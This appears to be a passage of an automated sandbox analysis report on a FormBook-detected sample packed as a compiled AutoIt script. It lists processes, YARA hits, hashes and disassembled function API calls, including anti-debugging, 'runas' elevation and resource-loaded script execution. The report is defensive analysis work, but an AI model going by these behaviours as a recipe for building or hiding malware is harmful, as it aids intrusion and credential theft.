Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\WyGagXWAfb.exe"
Imagebase:	0x2a0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2254547602.00000000031F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2254014316.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2255001512.0000000004400000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	14:18:06
Start date:	10/01/2025
Path:	C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe"
Imagebase:	0x310000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2925122303.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2925743661.0000000002F80000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	14:18:09
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\bitsadmin.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\bitsadmin.exe"
Imagebase:	0xfc0000
File size:	186'880 bytes
MD5 hash:	F57A03FA0E654B393BB078D1C60695F3
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2925411607.0000000000880000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2924526490.0000000000130000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2924737700.0000000000620000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	14:18:33
Start date:	10/01/2025
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.6%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	9.8%
Total number of Nodes:	2000
Total number of Limit Nodes:	177

Executed Functions

Function 00B13B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153windowCOMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B13B7A
IsDebuggerPresent.KERNEL32 ref: 00B13B8C
GetFullPathNameW.KERNEL32(00007FFF,?,?,00BD62F8,00BD62E0,?,?), ref: 00B13BFD

Part of subcall function 00B17D2C: _memmove.LIBCMT ref: 00B17D66

Part of subcall function 00B20A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00B13C26,00BD62F8,?,?,?), ref: 00B20ACE

SetCurrentDirectoryW.KERNEL32(?), ref: 00B13C81
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00BC93F0,00000010), ref: 00B4D4BC
SetCurrentDirectoryW.KERNEL32(?,00BD62F8,?,?,?), ref: 00B4D4F4
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00BC5D40,00BD62F8,?,?,?), ref: 00B4D57A
ShellExecuteW.SHELL32(00000000,?,?), ref: 00B4D581

Part of subcall function 00B13A58: GetSysColorBrush.USER32(0000000F), ref: 00B13A62
Part of subcall function 00B13A58: LoadCursorW.USER32(00000000,00007F00), ref: 00B13A71
Part of subcall function 00B13A58: LoadIconW.USER32(00000063), ref: 00B13A88
Part of subcall function 00B13A58: LoadIconW.USER32(000000A4), ref: 00B13A9A
Part of subcall function 00B13A58: LoadIconW.USER32(000000A2), ref: 00B13AAC
Part of subcall function 00B13A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00B13AD2
Part of subcall function 00B13A58: RegisterClassExW.USER32(?), ref: 00B13B28

Part of subcall function 00B139E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00B13A15
Part of subcall function 00B139E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00B13A36
Part of subcall function 00B139E7: ShowWindow.USER32(00000000,?,?), ref: 00B13A4A
Part of subcall function 00B139E7: ShowWindow.USER32(00000000,?,?), ref: 00B13A53

Part of subcall function 00B143DB: _memset.LIBCMT ref: 00B14401
Part of subcall function 00B143DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00B144A6

Strings

This is a third-party compiled AutoIt script., xrefs: 00B4D4B4
runas, xrefs: 00B4D575

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas
API String ID: 529118366-3287110873
Opcode ID: afb732faa42844c694ac02d37f9e00ea0bc44076b79e55a739bed1fe6b7c418c
Instruction ID: 1f5caec93d06d3a7f1f639284509378911094a199d68a0eb03c0e09cb74a9a96
Opcode Fuzzy Hash: afb732faa42844c694ac02d37f9e00ea0bc44076b79e55a739bed1fe6b7c418c
Instruction Fuzzy Hash: 6D51E631949249AACF11ABB4DC55EFDBBF8EF05700B4040E6F451A32A2FF744A85DB61

Function 00B14AFE Relevance: 10.7, APIs: 7, Instructions: 223COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 00B14B2B

Part of subcall function 00B17D2C: _memmove.LIBCMT ref: 00B17D66

GetCurrentProcess.KERNEL32(?,00B9FAEC,00000000,00000000,?), ref: 00B14BF8
IsWow64Process.KERNEL32(00000000), ref: 00B14BFF
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00B14C45
FreeLibrary.KERNEL32(00000000), ref: 00B14C50
GetSystemInfo.KERNEL32(00000000), ref: 00B14C81
GetSystemInfo.KERNEL32(00000000), ref: 00B14C8D

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: 8b4a3fa6ea6f1294df8804055fc62ebff758f8e3bc2ba71458af5e0c4cf0e24c
Instruction ID: 84993c6f1a10ef7ac3a5a7b4ae3088cf5237c34571621666f5e658d51cacf53d
Opcode Fuzzy Hash: 8b4a3fa6ea6f1294df8804055fc62ebff758f8e3bc2ba71458af5e0c4cf0e24c
Instruction Fuzzy Hash: 6191B43154A7C0DEC731CB6895916EBBFE4EF26300B944DDED0CA93A42D720E988D759

Function 00B14FE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00B14EEE,?,?,00000000,00000000), ref: 00B14FF9
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00B14EEE,?,?,00000000,00000000), ref: 00B15010
LoadResource.KERNEL32(?,00000000,?,?,00B14EEE,?,?,00000000,00000000,?,?,?,?,?,?,00B14F8F), ref: 00B4DD60
SizeofResource.KERNEL32(?,00000000,?,?,00B14EEE,?,?,00000000,00000000,?,?,?,?,?,?,00B14F8F), ref: 00B4DD75
LockResource.KERNEL32(00B14EEE,?,?,00B14EEE,?,?,00000000,00000000,?,?,?,?,?,?,00B14F8F,00000000), ref: 00B4DD88

Strings

SCRIPT, xrefs: 00B15006

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: f6058a7c4c3edab8bab04847281b674ae5c8b51c5de1cb3bb8c061ecf93171d2
Instruction ID: 40b42479196de51ccc17600b214bc6e733263a9c0a59eccde63eac897dcdde7a
Opcode Fuzzy Hash: f6058a7c4c3edab8bab04847281b674ae5c8b51c5de1cb3bb8c061ecf93171d2
Instruction Fuzzy Hash: C9115A75200705AFDB318B65DC58F677BBAEBC9B21F2081A9F406C6260DB61E8408660

Function 00B1FE40 Relevance: 5.5, APIs: 3, Instructions: 1040COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: BuffCharUpper
String ID:
API String ID: 3964851224-0
Opcode ID: 0464ea2586ff2799293c6df4fdceb94dd2416f90e99ce61a52d8e2765f276e2d
Instruction ID: b4ba4f20d481ba368c96c7d77e5dee7056e0911f12eb322a28cf43a941eff9c7
Opcode Fuzzy Hash: 0464ea2586ff2799293c6df4fdceb94dd2416f90e99ce61a52d8e2765f276e2d
Instruction Fuzzy Hash: EE925B706183518FD724EF14D480B6AB7E1FF89304F5489ADE88A9B352D771EC89CB92

Function 00B74696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00B4E7C1), ref: 00B746A6
FindFirstFileW.KERNELBASE(?,?), ref: 00B746B7
FindClose.KERNEL32(00000000), ref: 00B746C7

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 53177bed38d56800b41381272d8262819c8399ffbb64ceb4644f8cf84f2fdf6e
Instruction ID: f24900f0c41bafbb011cc8bcb5a24377fa413f2554a386913513b7976093c1a0
Opcode Fuzzy Hash: 53177bed38d56800b41381272d8262819c8399ffbb64ceb4644f8cf84f2fdf6e
Instruction Fuzzy Hash: 9CE0D8314144015B46106738EC4D4FA779CDE07336F104796F839C20E0EBB099509599

Function 00B1E800 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 00B5428C

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: 3dc4acb7658ebb0145c40448095bdc80e94c2cd2debefb40ab8b77fdfb1e7d56
Instruction ID: d3f608fa8e70e4eb97f56e384ffb27073a1c41afb0705c7f0bf6282053e33e23
Opcode Fuzzy Hash: 3dc4acb7658ebb0145c40448095bdc80e94c2cd2debefb40ab8b77fdfb1e7d56
Instruction Fuzzy Hash: D9A25B75A04206CBCB24CF54C490AEAB7F1FF49314FA480A9ED26AB351D735ED86CB91

Function 00B20B30 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B20BBB
timeGetTime.WINMM ref: 00B20E76
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B20FB3
TranslateMessage.USER32(?), ref: 00B20FC7
DispatchMessageW.USER32(?), ref: 00B20FD5
Sleep.KERNEL32(0000000A), ref: 00B20FDF
LockWindowUpdate.USER32(00000000,?,?), ref: 00B2105A
DestroyWindow.USER32 ref: 00B21066
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B21080
Sleep.KERNEL32(0000000A,?,?), ref: 00B552AD
TranslateMessage.USER32(?), ref: 00B5608A
DispatchMessageW.USER32(?), ref: 00B56098
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B560AC

Strings

@GUI_CTRLHANDLE, xrefs: 00B5540E
@GUI_CTRLID, xrefs: 00B55364
@GUI_WINHANDLE, xrefs: 00B553B9
@COM_EVENTOBJ, xrefs: 00B5591A
@TRAY_ID, xrefs: 00B55BB9

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 4003667617-3242690629
Opcode ID: 4315d7ec59636528ce019f8c9445a4f12515fceb8d31fe1a81c7ead3f4d8a597
Instruction ID: f26ce162a63225324468c0c7ffce24b579e7c59559ce99f94c14c530774a937f
Opcode Fuzzy Hash: 4315d7ec59636528ce019f8c9445a4f12515fceb8d31fe1a81c7ead3f4d8a597
Instruction Fuzzy Hash: B2B2AE70608741DBD734DF24D894BAAB7E5FF84305F1449DDE88A972A1DB71E888CB82

Function 00B793DF Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B791E9: __time64.LIBCMT ref: 00B791F3

Part of subcall function 00B15045: _fseek.LIBCMT ref: 00B1505D

__wsplitpath.LIBCMT ref: 00B794BE

Part of subcall function 00B3432E: __wsplitpath_helper.LIBCMT ref: 00B3436E

_wcscpy.LIBCMT ref: 00B794D1
_wcscat.LIBCMT ref: 00B794E4
__wsplitpath.LIBCMT ref: 00B79509
_wcscat.LIBCMT ref: 00B7951F
_wcscat.LIBCMT ref: 00B79532

Part of subcall function 00B7922F: _memmove.LIBCMT ref: 00B79268
Part of subcall function 00B7922F: _memmove.LIBCMT ref: 00B79277

_wcscmp.LIBCMT ref: 00B79479

Part of subcall function 00B799BE: _wcscmp.LIBCMT ref: 00B79AAE
Part of subcall function 00B799BE: _wcscmp.LIBCMT ref: 00B79AC1

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00B796DC
_wcsncpy.LIBCMT ref: 00B7974F
DeleteFileW.KERNEL32(?,?), ref: 00B79785
CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00B7979B
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B797AC
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B797BE

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: 8972190f1f1adea078190859546918ce7012a5533089b1ceea150fc5d4e21292
Instruction ID: 657830c8ff0a4976aca4fe06260e832e7b96b57e6fc1a58f9c268107be966f56
Opcode Fuzzy Hash: 8972190f1f1adea078190859546918ce7012a5533089b1ceea150fc5d4e21292
Instruction Fuzzy Hash: 23C11BB1900229AADF21DF94CC85ADEB7FDEF59310F1080EAF619E7151DB309A848F65

Function 00B13015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71windowregistryCOMMON

Download Yara Rule

APIs

GetSysColorBrush.USER32(0000000F), ref: 00B13074
RegisterClassExW.USER32(00000030), ref: 00B1309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B130AF
InitCommonControlsEx.COMCTL32(?), ref: 00B130CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B130DC
LoadIconW.USER32(000000A9), ref: 00B130F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B13101

Strings

TaskbarCreated, xrefs: 00B130A4
0, xrefs: 00B13056
AutoIt v3 GUI, xrefs: 00B13090
+, xrefs: 00B1305D

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 0ebc76140b42f980c1e4129134f6c1111c7a41860540ba2bb34af26cf8b383bb
Instruction ID: bc9e4e28e45adad010e470bf014d2bac850a06bc79f5b3a96d9be0534eeaa2f2
Opcode Fuzzy Hash: 0ebc76140b42f980c1e4129134f6c1111c7a41860540ba2bb34af26cf8b383bb
Instruction Fuzzy Hash: EC310971941209AFDB008FA4DD89AE9BBF4FB09324F14456BE550E72A0EBB64541CF90

Function 00B13041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON

Download Yara Rule

APIs

GetSysColorBrush.USER32(0000000F), ref: 00B13074
RegisterClassExW.USER32(00000030), ref: 00B1309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B130AF
InitCommonControlsEx.COMCTL32(?), ref: 00B130CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B130DC
LoadIconW.USER32(000000A9), ref: 00B130F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B13101

Strings

TaskbarCreated, xrefs: 00B130A4
0, xrefs: 00B13056
AutoIt v3 GUI, xrefs: 00B13090
+, xrefs: 00B1305D

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 1102dd0b702cbd8267ca7e972078e2b0c7cce2b8c8d19e942046ddf305963fb7
Instruction ID: eda507fa188ae297f7907acff3a09bca96625b7ecb1b14108ea230fbd9401345
Opcode Fuzzy Hash: 1102dd0b702cbd8267ca7e972078e2b0c7cce2b8c8d19e942046ddf305963fb7
Instruction Fuzzy Hash: 5221B4B1D01219AFDB00DFA4E949AEDBBF8FB08710F10412BF510E72A0EBB645549F91

Function 00B171EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B14864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00BD62F8,?,00B137C0,?), ref: 00B14882

Part of subcall function 00B3074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00B172C5), ref: 00B30771

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00B17308
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00B4ECF1
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00B4ED32
RegCloseKey.ADVAPI32(?), ref: 00B4ED70
_wcscat.LIBCMT ref: 00B4EDC9

Strings

Software\AutoIt v3\AutoIt, xrefs: 00B172FE
\, xrefs: 00B4EDEC
Include, xrefs: 00B4ECE8, 00B4ED29
\Include\, xrefs: 00B172C5

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 829e40c389dedb259a8ad6413b645e7a6550b4383324fa637b71b46214d3e5b4
Instruction ID: 639db89ad84dc3c7f2423ba5503c6451a340dd4095ea2bf0c732902b245c319c
Opcode Fuzzy Hash: 829e40c389dedb259a8ad6413b645e7a6550b4383324fa637b71b46214d3e5b4
Instruction Fuzzy Hash: F0715A715893419AC714EF25E8958EBB7F8FF9A310F8049AEF455831A0FF309988CB61

Function 00B13A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON

Download Yara Rule

APIs

GetSysColorBrush.USER32(0000000F), ref: 00B13A62
LoadCursorW.USER32(00000000,00007F00), ref: 00B13A71
LoadIconW.USER32(00000063), ref: 00B13A88
LoadIconW.USER32(000000A4), ref: 00B13A9A
LoadIconW.USER32(000000A2), ref: 00B13AAC
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00B13AD2
RegisterClassExW.USER32(?), ref: 00B13B28

Part of subcall function 00B13041: GetSysColorBrush.USER32(0000000F), ref: 00B13074
Part of subcall function 00B13041: RegisterClassExW.USER32(00000030), ref: 00B1309E
Part of subcall function 00B13041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B130AF
Part of subcall function 00B13041: InitCommonControlsEx.COMCTL32(?), ref: 00B130CC
Part of subcall function 00B13041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B130DC
Part of subcall function 00B13041: LoadIconW.USER32(000000A9), ref: 00B130F2
Part of subcall function 00B13041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B13101

Strings

0, xrefs: 00B13B06
#, xrefs: 00B13B0D
AutoIt v3, xrefs: 00B13B17

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
